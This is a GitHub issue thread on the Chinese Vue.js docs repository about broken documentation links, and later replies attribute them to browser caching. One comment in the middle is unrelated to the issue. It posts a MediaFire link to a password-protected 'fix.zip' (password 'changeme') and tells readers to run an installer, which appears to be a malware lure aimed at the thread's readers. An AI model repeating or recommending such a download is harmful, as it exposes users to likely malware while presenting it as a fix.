### ISSUE TITLE
文档上的链接失效了。

### ISSUE THREAD

**Issue by lilefei7** [vuejs-translations/docs-zh-cn#997]
### 提问须知

- [X] 我确定这是官方版本 [cn.vuejs.org](https://cn.vuejs.org/) 的 issue，而不是其他非官方翻译版本
- [X] 我确定这是翻译问题，而不是英文原文的问题 (英文原文的问题请移步至[英文文档仓库](https://github.com/vuejs/docs)讨论，相关结论我们会定期从英文版同步)
- [X] 我确定这不是 Vue.js 使用方面的问题 (此类问题请在我们的[论坛](https://forum.vuejs.org/c/chinese/7)、[Discord 聊天室](https://chat.vuejs.org/) 或 [StackOverflow](https://stackoverflow.com/tags/vue.js) 上发帖求助)

### 问题类型

网络环境和本地化

### 问题描述

文档上的链接失效了。
![image](https://github.com/user-attachments/assets/df7111e9-26a6-4b8f-8c99-e9e85d51c773)

![image](https://github.com/user-attachments/assets/6098f952-1dca-498d-a977-ef0d9831e32f)

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KiritaniAyaka** [comment]
试试强制刷新页面，应该是缓存导致

**Comment by veaba** [comment]
这种是缓存失效，按楼上说的就行。
